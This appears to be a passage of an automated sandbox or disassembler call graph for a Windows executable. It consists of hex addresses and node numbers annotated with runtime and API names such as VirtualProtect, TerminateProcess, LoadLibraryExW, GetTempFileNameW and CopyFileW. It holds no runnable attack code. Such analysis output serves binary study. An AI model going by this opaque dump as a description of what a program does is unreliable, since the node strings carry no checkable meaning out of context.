59 API calls Mailbox 101144->101520 101147 70be16 101145->101147 101150 697e4f 59 API calls 101147->101150 101148 70bdd7 101541 695d41 59 API calls Mailbox 101148->101541 101151 70be3a CharUpperBuffW 101150->101151 101155 70be54 101151->101155 101153 70bd8d 101521 69f460 101153->101521 101156 70bea7 101155->101156 101158 70be5b 101155->101158 101160 699837 84 API calls 101156->101160 101157 70bddf Mailbox 101542 69fce0 101157->101542 101622 6f72df 59 API calls Mailbox 101158->101622 101161 70beaf 101160->101161 101623 699e5d 60 API calls 101161->101623 101164 70be89 101165 69f460 330 API calls 101164->101165 101165->101140 101166 70beb9 101166->101140 101167 699837 84 API calls 101166->101167 101168 70bed4 101167->101168 101624 695d41 59 API calls Mailbox 101168->101624 101170 70bee4 101171 69fce0 330 API calls 101170->101171 101171->101140 102824 6e60c0 101172->102824 101174 6e618c 101174->101022 101175->101005 101176->101005 101179 699c9b 101177->101179 101178 699cd2 101178->101022 101179->101178 102829 698cd4 59 API calls Mailbox 101179->102829 101181 699cfd 101181->101022 101183 699d4a 101182->101183 101193 699d78 Mailbox 101182->101193 101184 699d9d 101183->101184 101187 699d50 Mailbox 101183->101187 101186 698047 59 API calls 101184->101186 101185 699d64 101188 699dcc 101185->101188 101189 699d6f 101185->101189 101185->101193 101186->101193 101187->101185 101190 6cfa0f 101187->101190 101188->101193 102830 698cd4 59 API calls Mailbox 101188->102830 101191 6cf9e6 VariantClear 101189->101191 101189->101193 101190->101193 102831 6e6e8f 59 API calls 101190->102831 101191->101193 101193->101026 101195->100988 101196->101022 101197->100994 101199 69805a 101198->101199 101200 698052 101198->101200 101199->101007 102832 697f77 59 API calls 2 library calls 101200->102832 101202->101023 101203->101023 101204->101007 101205->101010 101206->101007 101210 6b0dbe 101207->101210 101209 6b0dd8 101209->101055 101210->101209 101212 6b0ddc std::exception::exception 101210->101212 101223 6b571c 101210->101223 101240 6b33a1 DecodePointer 101210->101240 101241 6b859b RaiseException 101212->101241 101214 6b0e06 101242 6b84d1 58 API calls _free 101214->101242 101216 6b0e18 101216->101055 101217->101055 101218->101055 101219->101050 101220->101040 101221->101042 101222->101040 101224 6b5797 101223->101224 101237 6b5728 101223->101237 101249 6b33a1 DecodePointer 101224->101249 101226 6b579d 101250 6b8b28 58 API calls __getptd_noexit 101226->101250 101229 6b575b RtlAllocateHeap 101229->101237 101239 6b578f 101229->101239 101231 6b5783 101247 6b8b28 58 API calls __getptd_noexit 101231->101247 101235 6b5781 101248 6b8b28 58 API calls __getptd_noexit 101235->101248 101236 6b5733 101236->101237 101243 6ba16b 58 API calls __NMSG_WRITE 101236->101243 101244 6ba1c8 58 API calls 7 library calls 101236->101244 101245 6b309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101236->101245 101237->101229 101237->101231 101237->101235 101237->101236 101246 6b33a1 DecodePointer 101237->101246 101239->101210 101240->101210 101241->101214 101242->101216 101243->101236 101244->101236 101246->101237 101247->101235 101248->101239 101249->101226 101250->101239 101252 69984b 101251->101252 101253 699851 101251->101253 101269 696240 101252->101269 101254 6cf5d3 __i64tow 101253->101254 101255 699899 101253->101255 101256 699857 __itow 101253->101256 101261 6cf4da 101253->101261 101295 6b3698 83 API calls 3 library calls 101255->101295 101258 6b0db6 Mailbox 59 API calls 101256->101258 101262 699871 101258->101262 101260 6cf552 Mailbox _wcscpy 101296 6b3698 83 API calls 3 library calls 101260->101296 101261->101260 101263 6b0db6 Mailbox 59 API calls 101261->101263 101262->101252 101264 697de1 59 API calls 101262->101264 101265 6cf51f 101263->101265 101264->101252 101266 6b0db6 Mailbox 59 API calls 101265->101266 101267 6cf545 101266->101267 101267->101260 101268 697de1 59 API calls 101267->101268 101268->101260 101297 697a16 101269->101297 101271 69646a 101308 69750f 101271->101308 101273 696484 Mailbox 101273->101063 101276 6cdff6 101321 6ef8aa 91 API calls 4 library calls 101276->101321 101277 69750f 59 API calls 101288 696265 101277->101288 101279 696799 _memmove 101322 6ef8aa 91 API calls 4 library calls 101279->101322 101282 697d8c 59 API calls 101282->101288 101283 6ce004 101284 69750f 59 API calls 101283->101284 101285 6ce01a 101284->101285 101285->101273 101286 6cdf92 101318 698029 101286->101318 101288->101271 101288->101276 101288->101277 101288->101279 101288->101282 101288->101286 101302 695f6c 60 API calls 101288->101302 101303 697e4f 101288->101303 101307 695d41 59 API calls Mailbox 101288->101307 101316 695e72 60 API calls 101288->101316 101317 697924 59 API calls 2 library calls 101288->101317 101290 6cdf9d 101293 6b0db6 Mailbox 59 API calls 101290->101293 101292 69643b CharUpperBuffW 101292->101288 101293->101279 101294->101066 101295->101256 101296->101254 101298 6b0db6 Mailbox 59 API calls 101297->101298 101299 697a3b 101298->101299 101300 698029 59 API calls 101299->101300 101301 697a4a 101300->101301 101301->101288 101302->101288 101304 697e62 101303->101304 101306 697e5f _memmove 101303->101306 101305 6b0db6 Mailbox 59 API calls 101304->101305 101305->101306 101306->101292 101307->101288 101309 6975af 101308->101309 101310 697522 _memmove 101308->101310 101312 6b0db6 Mailbox 59 API calls 101309->101312 101311 6b0db6 Mailbox 59 API calls 101310->101311 101314 697529 101311->101314 101312->101310 101313 697552 101313->101273 101314->101313 101315 6b0db6 Mailbox 59 API calls 101314->101315 101315->101313 101316->101288 101317->101288 101319 6b0db6 Mailbox 59 API calls 101318->101319 101320 698033 101319->101320 101320->101290 101321->101283 101322->101273 101324 699837 84 API calls 101323->101324 101325 70cb1a 101324->101325 101340 70cb61 Mailbox 101325->101340 101361 70d7a5 101325->101361 101327 70cf2e 101410 70d8c8 92 API calls Mailbox 101327->101410 101330 70cf3d 101331 70cdc7 101330->101331 101332 70cf49 101330->101332 101374 70c96e 101331->101374 101332->101340 101333 699837 84 API calls 101339 70cbb2 Mailbox 101333->101339 101338 70ce00 101389 6b0c08 101338->101389 101339->101333 101339->101340 101348 70cdb9 101339->101348 101393 70fbce 59 API calls 2 library calls 101339->101393 101394 70cfdf 61 API calls 2 library calls 101339->101394 101340->101069 101343 70ce33 101396 6992ce 101343->101396 101344 70ce1a 101395 6f9e4a 89 API calls 4 library calls 101344->101395 101347 70ce25 GetCurrentProcess TerminateProcess 101347->101343 101348->101327 101348->101331 101353 70cfa4 101353->101340 101357 70cfb8 FreeLibrary 101353->101357 101354 70ce6b 101408 70d649 107 API calls _free 101354->101408 101357->101340 101359 699d3c 60 API calls 101360 70ce7c 101359->101360 101360->101353 101360->101359 101409 698d40 59 API calls Mailbox 101360->101409 101411 70d649 107 API calls _free 101360->101411 101362 697e4f 59 API calls 101361->101362 101363 70d7c0 CharLowerBuffW 101362->101363 101412 6ef167 101363->101412 101370 70d810 101437 697d2c 101370->101437 101372 70d81c Mailbox 101373 70d858 Mailbox 101372->101373 101441 70cfdf 61 API calls 2 library calls 101372->101441 101373->101339 101375 70c989 101374->101375 101379 70c9de 101374->101379 101376 6b0db6 Mailbox 59 API calls 101375->101376 101378 70c9ab 101376->101378 101377 6b0db6 Mailbox 59 API calls 101377->101378 101378->101377 101378->101379 101380 70da50 101379->101380 101381 70dc79 Mailbox 101380->101381 101388 70da73 _strcat _wcscpy __wsetenvp 101380->101388 101381->101338 101382 699be6 59 API calls 101382->101388 101383 699b3c 59 API calls 101383->101388 101384 699b98 59 API calls 101384->101388 101385 699837 84 API calls 101385->101388 101386 6b571c 58 API calls __crtCompareStringA_stat 101386->101388 101388->101381 101388->101382 101388->101383 101388->101384 101388->101385 101388->101386 101448 6f5887 61 API calls 2 library calls 101388->101448 101390 6b0c1d 101389->101390 101391 6b0cb5 VirtualProtect 101390->101391 101392 6b0c83 101390->101392 101391->101392 101392->101343 101392->101344 101393->101339 101394->101339 101395->101347 101397 6992d6 101396->101397 101398 6b0db6 Mailbox 59 API calls 101397->101398 101399 6992e4 101398->101399 101400 6992f0 101399->101400 101449 6991fc 59 API calls Mailbox 101399->101449 101402 699050 101400->101402 101450 699160 101402->101450 101404 69905f 101405 6b0db6 Mailbox 59 API calls 101404->101405 101406 6990fb 101404->101406 101405->101406 101406->101360 101407 698d40 59 API calls Mailbox 101406->101407 101407->101354 101408->101360 101409->101360 101410->101330 101411->101360 101413 6ef192 __wsetenvp 101412->101413 101414 6ef1d1 101413->101414 101417 6ef1c7 101413->101417 101418 6ef278 101413->101418 101414->101372 101419 697667 101414->101419 101417->101414 101442 6978c4 61 API calls 101417->101442 101418->101414 101443 6978c4 61 API calls 101418->101443 101420 6b0db6 Mailbox 59 API calls 101419->101420 101421 697688 101420->101421 101422 6b0db6 Mailbox 59 API calls 101421->101422 101423 697696 101422->101423 101424 69784b 101423->101424 101425 69785a 101424->101425 101426 6978b7 101424->101426 101425->101426 101428 697865 101425->101428 101427 697d2c 59 API calls 101426->101427 101434 697888 _memmove 101427->101434 101429 6ceb09 101428->101429 101430 697880 101428->101430 101432 698029 59 API calls 101429->101432 101444 697f27 101430->101444 101433 6ceb13 101432->101433 101435 6b0db6 Mailbox 59 API calls 101433->101435 101434->101370 101436 6ceb33 101435->101436 101438 697d3a 101437->101438 101440 697d43 _memmove 101437->101440 101439 697e4f 59 API calls 101438->101439 101438->101440 101439->101440 101440->101372 101441->101373 101442->101417 101443->101418 101445 697f39 101444->101445 101446 697f3f 101444->101446 101445->101434 101447 6b0db6 Mailbox 59 API calls 101446->101447 101447->101445 101448->101388 101449->101400 101451 699169 Mailbox 101450->101451 101452 6cf19f 101451->101452 101457 699173 101451->101457 101453 6b0db6 Mailbox 59 API calls 101452->101453 101454 6cf1ab 101453->101454 101455 69917a 101455->101404 101456 699c90 Mailbox 59 API calls 101456->101457 101457->101455 101457->101456 101459 699b4d 101458->101459 101460 699b52 101458->101460 101459->101460 101463 6b358a 59 API calls 101459->101463 101460->101076 101462->101080 101463->101460 101465 6f78ea 101464->101465 101467 6f77ca 101464->101467 101465->101085 101466 6f780a 101468 6b0db6 Mailbox 59 API calls 101466->101468 101467->101466 101469 6f77e2 101467->101469 101470 6f7821 101467->101470 101484 6f7800 Mailbox _memmove 101468->101484 101469->101466 101471 6f77f2 101469->101471 101474 6b0db6 Mailbox 59 API calls 101470->101474 101481 6f783e 101470->101481 101477 6b0db6 Mailbox 59 API calls 101471->101477 101472 6f7869 101475 6b0db6 Mailbox 59 API calls 101472->101475 101473 6f7877 101476 6b0db6 Mailbox 59 API calls 101473->101476 101474->101481 101475->101484 101478 6f787d 101476->101478 101477->101484 101485 6f746b 59 API calls Mailbox 101478->101485 101479 6b0db6 Mailbox 59 API calls 101479->101465 101481->101472 101481->101473 101481->101484 101482 6f7889 101486 695a15 61 API calls Mailbox 101482->101486 101484->101479 101485->101482 101486->101484 101487->101120 101488->101120 101490 6ced4a 101489->101490 101491 697cbf 101489->101491 101492 698029 59 API calls 101490->101492 101506 697c50 101491->101506 101495 6ced55 __wsetenvp _memmove 101492->101495 101494 697cca 101496 697b2e 101494->101496 101497 6cec6b 101496->101497 101498 697b40 101496->101498 101517 6e7bdb 59 API calls _memmove 101497->101517 101511 697a51 101498->101511 101501 697b4c 101501->101100 101502 6cec75 101503 698047 59 API calls 101502->101503 101504 6cec7d Mailbox 101503->101504 101505->101101 101507 697c5f __wsetenvp 101506->101507 101508 698029 59 API calls 101507->101508 101509 697c70 _memmove 101507->101509 101510 6ced07 _memmove 101508->101510 101509->101494 101512 697a5f 101511->101512 101513 697a85 _memmove 101511->101513 101512->101513 101514 6b0db6 Mailbox 59 API calls 101512->101514 101513->101501 101515 697ad4 101514->101515 101516 6b0db6 Mailbox 59 API calls 101515->101516 101516->101513 101517->101502 101518->101140 101519->101137 101520->101153 101522 69f4ba 101521->101522 101523 69f650 101521->101523 101524 6d441e 101522->101524 101525 69f4c6 101522->101525 101526 697de1 59 API calls 101523->101526 101527 70bc6b 331 API calls 101524->101527 101714 69f290 331 API calls 2 library calls 101525->101714 101532 69f58c Mailbox 101526->101532 101529 6d442c 101527->101529 101533 69f630 101529->101533 101715 6f9e4a 89 API calls 4 library calls 101529->101715 101531 69f4fd 101531->101529 101531->101532 101531->101533 101539 70445a 331 API calls 101532->101539 101625 6fcb7a 101532->101625 101705 694e4a 101532->101705 101711 6f3c37 101532->101711 101533->101140 101534 699c90 Mailbox 59 API calls 101535 69f5e3 101534->101535 101535->101533 101535->101534 101539->101535 101540->101148 101541->101157 102581 698180 101542->102581 101544 69fd3d 101545 6d472d 101544->101545 101606 6a06f6 101544->101606 102586 69f234 101544->102586 102688 6f9e4a 89 API calls 4 library calls 101545->102688 101549 69fe3e 101550 6d488d 101549->101550 101553 69fe4c 101549->101553 102692 6e66ec 59 API calls 2 library calls 101549->102692 101550->101553 101601 6d4742 101550->101601 102694 70a2d9 85 API calls Mailbox 101550->102694 101551 6d4b53 101551->101601 102713 6f9e4a 89 API calls 4 library calls 101551->102713 101552 6a0517 101559 6b0db6 Mailbox 59 API calls 101552->101559 101553->101551 101561 6d48f9 101553->101561 102590 69837c 101553->102590 101554 6d47d7 101554->101601 102690 6f9e4a 89 API calls 4 library calls 101554->102690 101566 6a0545 _memmove 101559->101566 101560 6d4848 102693 6e60ef 59 API calls 2 library calls 101560->102693 101567 6d4917 101561->101567 102696 6985c0 101561->102696 101565 6d4755 101565->101554 102689 69f6a3 331 API calls 101565->102689 101579 6b0db6 Mailbox 59 API calls 101566->101579 101575 6d4928 101567->101575 101576 6985c0 59 API calls 101567->101576 101568 69fea4 101577 6d4ad6 101568->101577 101578 69ff32 101568->101578 101585 6a0179 Mailbox _memmove 101568->101585 101569 6d486b 101572 699ea0 331 API calls 101569->101572 101570 6d48b2 Mailbox 101570->101553 102695 6e66ec 59 API calls 2 library calls 101570->102695 101572->101550 101573 6b0db6 59 API calls Mailbox 101586 69fdd3 101573->101586 101575->101585 102704 6e60ab 59 API calls Mailbox 101575->102704 101576->101575 102712 6f9ae7 60 API calls 101577->102712 101582 6b0db6 Mailbox 59 API calls 101578->101582 101587 6a0106 _memmove 101579->101587 101588 69ff39 101582->101588 101583 69ffe6 101605 698047 59 API calls 101583->101605 101607 6a0007 101583->101607 101600 6d4ab2 101585->101600 101604 699d3c 60 API calls 101585->101604 101585->101606 101608 6a0398 101585->101608 101610 6b0db6 59 API calls Mailbox 101585->101610 101615 6d4a1c 101585->101615 101620 6d4a4d 101585->101620 102685 698740 68 API calls __cinit 101585->102685 102686 698660 68 API calls 101585->102686 102705 6f5937 68 API calls 101585->102705 102706 6989b3 69 API calls Mailbox 101585->102706 101586->101549 101586->101552 101586->101565 101586->101566 101586->101573 101589 699ea0 331 API calls 101586->101589 101597 6d480c 101586->101597 101586->101601 101587->101585 101603 699c90 Mailbox 59 API calls 101587->101603 101621 6a0162 101587->101621 101588->101606 102597 6a09d0 101588->102597 101589->101586 101590 699ea0 331 API calls 101594 6d4a87 101590->101594 101593 69ffb2 101593->101566 101593->101583 101593->101606 101594->101601 102707 6984c0 101594->102707 102691 6f9e4a 89 API calls 4 library calls 101597->102691 102711 6f9e4a 89 API calls 4 library calls 101600->102711 101603->101587 101604->101585 101605->101607 102687 6f9e4a 89 API calls 4 library calls 101606->102687 101607->101606 101609 6d4b24 101607->101609 101612 6a004c 101607->101612 101608->101140 101611 699d3c 60 API calls 101609->101611 101610->101585 101611->101551 101612->101551 101612->101606 101613 6a00d8 101612->101613 101614 699d3c 60 API calls 101613->101614 101616 6a00eb 101614->101616 101617 6b0db6 Mailbox 59 API calls 101615->101617 101616->101606 102674 6982df 101616->102674 101617->101620 101620->101590 101621->101140 101622->101164 101623->101166 101624->101170 101626 697667 59 API calls 101625->101626 101627 6fcbaf 101626->101627 101628 697667 59 API calls 101627->101628 101629 6fcbb8 101628->101629 101630 6fcbcc 101629->101630 101631 699b3c 59 API calls 101629->101631 101632 699837 84 API calls 101630->101632 101631->101630 101633 6fcbe9 101632->101633 101634 6fcc0b 101633->101634 101635 6fccea 101633->101635 101704 6fcd1a Mailbox 101633->101704 101636 699837 84 API calls 101634->101636 101716 694ddd 101635->101716 101638 6fcc17 101636->101638 101640 698047 59 API calls 101638->101640 101643 6fcc23 101640->101643 101641 6fcd16 101642 697667 59 API calls 101641->101642 101641->101704 101645 6fcd4b 101642->101645 101648 6fcc69 101643->101648 101649 6fcc37 101643->101649 101644 694ddd 136 API calls 101644->101641 101646 697667 59 API calls 101645->101646 101647 6fcd54 101646->101647 101652 697667 59 API calls 101647->101652 101651 699837 84 API calls 101648->101651 101650 698047 59 API calls 101649->101650 101653 6fcc47 101650->101653 101654 6fcc76 101651->101654 101655 6fcd5d 101652->101655 101656 697cab 59 API calls 101653->101656 101657 698047 59 API calls 101654->101657 101658 697667 59 API calls 101655->101658 101659 6fcc51 101656->101659 101660 6fcc82 101657->101660 101661 6fcd66 101658->101661 101662 699837 84 API calls 101659->101662 101903 6f4a31 GetFileAttributesW 101660->101903 101664 699837 84 API calls 101661->101664 101665 6fcc5d 101662->101665 101667 6fcd73 101664->101667 101669 697b2e 59 API calls 101665->101669 101666 6fcc8b 101670 6fcc9e 101666->101670 101673 6979f2 59 API calls 101666->101673 101740 69459b 101667->101740 101669->101648 101672 699837 84 API calls 101670->101672 101679 6fcca4 101670->101679 101671 6fcd8e 101791 6979f2 101671->101791 101675 6fcccb 101672->101675 101673->101670 101904 6f37ef 75 API calls Mailbox 101675->101904 101678 6fcdd1 101681 698047 59 API calls 101678->101681 101679->101704 101680 6979f2 59 API calls 101682 6fcdae 101680->101682 101683 6fcddf 101681->101683 101682->101678 101905 697bcc 101682->101905 101684 697b2e 59 API calls 101683->101684 101686 6fcded 101684->101686 101687 697b2e 59 API calls 101686->101687 101689 6fcdfb 101687->101689 101688 6fcdc3 101690 697bcc 59 API calls 101688->101690 101691 697b2e 59 API calls 101689->101691 101690->101678 101692 6fce09 101691->101692 101693 699837 84 API calls 101692->101693 101694 6fce15 101693->101694 101794 6f4071 101694->101794 101696 6fce26 101697 6f3c37 3 API calls 101696->101697 101698 6fce30 101697->101698 101699 699837 84 API calls 101698->101699 101702 6fce61 101698->101702 101700 6fce4e 101699->101700 101848 6f9155 101700->101848 101703 694e4a 84 API calls 101702->101703 101703->101704 101704->101535 101706 694e5b 101705->101706 101707 694e54 101705->101707 101709 694e7b FreeLibrary 101706->101709 101710 694e6a 101706->101710 101708 6b53a6 __fcloseall 83 API calls 101707->101708 101708->101706 101709->101710 101710->101535 102577 6f445a GetFileAttributesW 101711->102577 101714->101531 101715->101533 101914 694bb5 101716->101914 101721 694e08 LoadLibraryExW 101924 694b6a 101721->101924 101722 6cd8e6 101724 694e4a 84 API calls 101722->101724 101726 6cd8ed 101724->101726 101728 694b6a 3 API calls 101726->101728 101730 6cd8f5 101728->101730 101729 694e2f 101729->101730 101731 694e3b 101729->101731 101950 694f0b 101730->101950 101732 694e4a 84 API calls 101731->101732 101734 694e40 101732->101734 101734->101641 101734->101644 101737 6cd91c 101958 694ec7 101737->101958 101741 697667 59 API calls 101740->101741 101742 6945b1 101741->101742 101743 697667 59 API calls 101742->101743 101744 6945b9 101743->101744 101745 697667 59 API calls 101744->101745 101746 6945c1 101745->101746 101747 697667 59 API calls 101746->101747 101748 6945c9 101747->101748 101749 6945fd 101748->101749 101750 6cd4d2 101748->101750 101751 69784b 59 API calls 101749->101751 101752 698047 59 API calls 101750->101752 101753 69460b 101751->101753 101754 6cd4db 101752->101754 101755 697d2c 59 API calls 101753->101755 102258 697d8c 101754->102258 101757 694615 101755->101757 101758 69784b 59 API calls 101757->101758 101759 694640 101757->101759 101762 694636 101758->101762 101760 694680 101759->101760 101763 69465f 101759->101763 101773 6cd4fb 101759->101773 101761 69784b 59 API calls 101760->101761 101765 694691 101761->101765 101766 697d2c 59 API calls 101762->101766 101764 6979f2 59 API calls 101763->101764 101768 694669 101764->101768 101769 6946a3 101765->101769 101771 698047 59 API calls 101765->101771 101766->101759 101767 6cd5cb 101770 697bcc 59 API calls 101767->101770 101768->101760 101774 69784b 59 API calls 101768->101774 101772 6946b3 101769->101772 101775 698047 59 API calls 101769->101775 101786 6cd588 101770->101786 101771->101769 101777 6946ba 101772->101777 101778 698047 59 API calls 101772->101778 101773->101767 101776 6cd5b4 101773->101776 101784 6cd532 101773->101784 101774->101760 101775->101772 101776->101767 101781 6cd59f 101776->101781 101779 698047 59 API calls 101777->101779 101788 6946c1 Mailbox 101777->101788 101778->101777 101779->101788 101780 6cd590 101782 697bcc 59 API calls 101780->101782 101783 697bcc 59 API calls 101781->101783 101782->101786 101783->101786 101784->101780 101789 6cd57b 101784->101789 101785 6979f2 59 API calls 101785->101786 101786->101760 101786->101785 102262 697924 59 API calls 2 library calls 101786->102262 101788->101671 101790 697bcc 59 API calls 101789->101790 101790->101786 101792 697e4f 59 API calls 101791->101792 101793 6979fd 101792->101793 101793->101678 101793->101680 101795 6f408d 101794->101795 101796 6f4092 101795->101796 101797 6f40a0 101795->101797 101798 698047 59 API calls 101796->101798 101799 697667 59 API calls 101797->101799 101847 6f409b Mailbox 101798->101847 101800 6f40a8 101799->101800 101801 697667 59 API calls 101800->101801 101802 6f40b0 101801->101802 101803 697667 59 API calls 101802->101803 101804 6f40bb 101803->101804 101805 697667 59 API calls 101804->101805 101806 6f40c3 101805->101806 101807 697667 59 API calls 101806->101807 101808 6f40cb 101807->101808 101809 697667 59 API calls 101808->101809 101810 6f40d3 101809->101810 101811 697667 59 API calls 101810->101811 101812 6f40db 101811->101812 101813 697667 59 API calls 101812->101813 101814 6f40e3 101813->101814 101815 69459b 59 API calls 101814->101815 101816 6f40fa 101815->101816 101817 69459b 59 API calls 101816->101817 101818 6f4113 101817->101818 101819 6979f2 59 API calls 101818->101819 101820 6f411f 101819->101820 101821 6f4132 101820->101821 101822 697d2c 59 API calls 101820->101822 101823 6979f2 59 API calls 101821->101823 101822->101821 101824 6f413b 101823->101824 101825 6f414b 101824->101825 101826 697d2c 59 API calls 101824->101826 101827 698047 59 API calls 101825->101827 101826->101825 101828 6f4157 101827->101828 101829 697b2e 59 API calls 101828->101829 101830 6f4163 101829->101830 102263 6f4223 59 API calls 101830->102263 101832 6f4172 102264 6f4223 59 API calls 101832->102264 101834 6f4185 101835 6979f2 59 API calls 101834->101835 101836 6f418f 101835->101836 101837 6f41a6 101836->101837 101838 6f4194 101836->101838 101840 6979f2 59 API calls 101837->101840 101839 697cab 59 API calls 101838->101839 101841 6f41a1 101839->101841 101842 6f41af 101840->101842 101846 697b2e 59 API calls 101841->101846 101843 6f41cd 101842->101843 101845 697cab 59 API calls 101842->101845 101844 697b2e 59 API calls 101843->101844 101844->101847 101845->101841 101846->101843 101847->101696 101849 6f9162 __write_nolock 101848->101849 101850 6b0db6 Mailbox 59 API calls 101849->101850 101851 6f91bf 101850->101851 101852 69522e 59 API calls 101851->101852 101853 6f91c9 101852->101853 101854 6f8f5f GetSystemTimeAsFileTime 101853->101854 101855 6f91d4 101854->101855 101856 694ee5 85 API calls 101855->101856 101857 6f91e7 _wcscmp 101856->101857 101858 6f920b 101857->101858 101859 6f92b8 101857->101859 102295 6f9734 101858->102295 101861 6f9734 96 API calls 101859->101861 101876 6f9284 _wcscat 101861->101876 101864 694f0b 74 API calls 101865 6f92dd 101864->101865 101867 694f0b 74 API calls 101865->101867 101866 6f92c1 101866->101702 101869 6f92ed 101867->101869 101868 6f9239 _wcscat _wcscpy 102302 6b40fb 58 API calls __wsplitpath_helper 101868->102302 101870 694f0b 74 API calls 101869->101870 101872 6f9308 101870->101872 101873 694f0b 74 API calls 101872->101873 101874 6f9318 101873->101874 101875 694f0b 74 API calls 101874->101875 101877 6f9333 101875->101877 101876->101864 101876->101866 101878 694f0b 74 API calls 101877->101878 101879 6f9343 101878->101879 101880 694f0b 74 API calls 101879->101880 101881 6f9353 101880->101881 101882 694f0b 74 API calls 101881->101882 101883 6f9363 101882->101883 102265 6f98e3 GetTempPathW GetTempFileNameW 101883->102265 101885 6f936f 101886 6b525b 115 API calls 101885->101886 101896 6f9380 101886->101896 101887 6f943a 102279 6b53a6 101887->102279 101889 6f9445 101891 6f945f 101889->101891 101892 6f944b DeleteFileW 101889->101892 101890 694f0b 74 API calls 101890->101896 101893 6f9505 CopyFileW 101891->101893 101898 6f9469 _wcsncpy 101891->101898 101892->101866 101896->101866 101896->101887 101896->101890 102266 6b4863 101896->102266 101903->101666 101904->101679 101906 697bd8 __wsetenvp 101905->101906 101907 697c45 101905->101907 101909 697bee 101906->101909 101910 697c13 101906->101910 101908 697d2c 59 API calls 101907->101908 101913 697bf6 _memmove 101908->101913 101911 697f27 59 API calls 101909->101911 101912 698029 59 API calls 101910->101912 101911->101913 101912->101913 101913->101688 101963 694c03 101914->101963 101917 694c03 2 API calls 101920 694bdc 101917->101920 101918 694bec FreeLibrary 101919 694bf5 101918->101919 101921 6b525b 101919->101921 101920->101918 101920->101919 101967 6b5270 101921->101967 101923 694dfc 101923->101721 101923->101722 102173 694c36 101924->102173 101927 694c36 2 API calls 101930 694b8f 101927->101930 101928 694baa 101931 694c70 101928->101931 101929 694ba1 FreeLibrary 101929->101928 101930->101928 101930->101929 101932 6b0db6 Mailbox 59 API calls 101931->101932 101933 694c85 101932->101933 102177 69522e 101933->102177 101935 694c91 _memmove 101936 694ccc 101935->101936 101937 694d89 101935->101937 101938 694dc1 101935->101938 101939 694ec7 69 API calls 101936->101939 102180 694e89 CreateStreamOnHGlobal 101937->102180 102191 6f991b 95 API calls 101938->102191 101942 694cd5 101939->101942 101943 694f0b 74 API calls 101942->101943 101944 694d69 101942->101944 101946 6cd8a7 101942->101946 102186 694ee5 101942->102186 101943->101942 101944->101729 101947 694ee5 85 API calls 101946->101947 101948 6cd8bb 101947->101948 101949 694f0b 74 API calls 101948->101949 101949->101944 101951 6cd9cd 101950->101951 101952 694f1d 101950->101952 102215 6b55e2 101952->102215 101955 6f9109 102235 6f8f5f 101955->102235 101957 6f911f 101957->101737 101959 694ed6 101958->101959 101962 6cd990 101958->101962 102240 6b5c60 101959->102240 101961 694ede 101964 694bd0 101963->101964 101965 694c0c LoadLibraryA 101963->101965 101964->101917 101964->101920 101965->101964 101966 694c1d GetProcAddress 101965->101966 101966->101964 101970 6b527c __write 101967->101970 101968 6b528f 102016 6b8b28 58 API calls __getptd_noexit 101968->102016 101970->101968 101972 6b52c0 101970->101972 101971 6b5294 102017 6b8db6 9 API calls __write 101971->102017 101986 6c04e8 101972->101986 101975 6b52c5 101976 6b52db 101975->101976 101977 6b52ce 101975->101977 101979 6b5305 101976->101979 101980 6b52e5 101976->101980 102018 6b8b28 58 API calls __getptd_noexit 101977->102018 102001 6c0607 101979->102001 102019 6b8b28 58 API calls __getptd_noexit 101980->102019 101982 6b529f __write @_EH4_CallFilterFunc@8 101982->101923 101987 6c04f4 __write 101986->101987 102021 6b9c0b 101987->102021 101989 6c0502 101990 6c057d 101989->101990 101999 6c0576 101989->101999 102031 6b9c93 101989->102031 102055 6b6c50 59 API calls __lock 101989->102055 102056 6b6cba LeaveCriticalSection LeaveCriticalSection _doexit 101989->102056 102057 6b881d 58 API calls 2 library calls 101990->102057 101993 6c0584 101993->101999 102058 6b9e2b InitializeCriticalSectionAndSpinCount 101993->102058 101994 6c05f3 __write 101994->101975 101998 6c05aa EnterCriticalSection 101998->101999 102028 6c05fe 101999->102028 102002 6c0627 __wopenfile 102001->102002 102003 6c0641 102002->102003 102015 6c07fc 102002->102015 102080 6b37cb 60 API calls 2 library calls 102002->102080 102078 6b8b28 58 API calls __getptd_noexit 102003->102078 102005 6c0646 102079 6b8db6 9 API calls __write 102005->102079 102007 6c085f 102075 6c85a1 102007->102075 102009 6b5310 102020 6b5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 102009->102020 102011 6c07f5 102011->102015 102081 6b37cb 60 API calls 2 library calls 102011->102081 102013 6c0814 102013->102015 102082 6b37cb 60 API calls 2 library calls 102013->102082 102015->102003 102015->102007 102016->101971 102017->101982 102018->101982 102019->101982 102020->101982 102022 6b9c2f EnterCriticalSection 102021->102022 102023 6b9c1c 102021->102023 102022->101989 102024 6b9c93 __mtinitlocknum 57 API calls 102023->102024 102025 6b9c22 102024->102025 102025->102022 102059 6b30b5 58 API calls 3 library calls 102025->102059 102060 6b9d75 LeaveCriticalSection 102028->102060 102030 6c0605 102030->101994 102032 6b9c9f __write 102031->102032 102033 6b9ca8 102032->102033 102034 6b9cc0 102032->102034 102061 6ba16b 58 API calls __NMSG_WRITE 102033->102061 102047 6b9ce1 __write 102034->102047 102064 6b881d 58 API calls 2 library calls 102034->102064 102037 6b9cad 102062 6ba1c8 58 API calls 7 library calls 102037->102062 102039 6b9cd5 102041 6b9ceb 102039->102041 102042 6b9cdc 102039->102042 102040 6b9cb4 102063 6b309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 102040->102063 102045 6b9c0b __lock 58 API calls 102041->102045 102065 6b8b28 58 API calls __getptd_noexit 102042->102065 102048 6b9cf2 102045->102048 102047->101989 102049 6b9cff 102048->102049 102050 6b9d17 102048->102050 102066 6b9e2b InitializeCriticalSectionAndSpinCount 102049->102066 102067 6b2d55 102050->102067 102053 6b9d0b 102073 6b9d33 LeaveCriticalSection _doexit 102053->102073 102055->101989 102056->101989 102057->101993 102058->101998 102060->102030 102061->102037 102062->102040 102064->102039 102065->102047 102066->102053 102068 6b2d5e RtlFreeHeap 102067->102068 102072 6b2d87 _free 102067->102072 102069 6b2d73 102068->102069 102068->102072 102074 6b8b28 58 API calls __getptd_noexit 102069->102074 102071 6b2d79 GetLastError 102071->102072 102072->102053 102073->102047 102074->102071 102083 6c7d85 102075->102083 102077 6c85ba 102077->102009 102078->102005 102079->102009 102080->102011 102081->102013 102082->102015 102086 6c7d91 __write 102083->102086 102084 6c7da7 102170 6b8b28 58 API calls __getptd_noexit 102084->102170 102086->102084 102088 6c7ddd 102086->102088 102087 6c7dac 102171 6b8db6 9 API calls __write 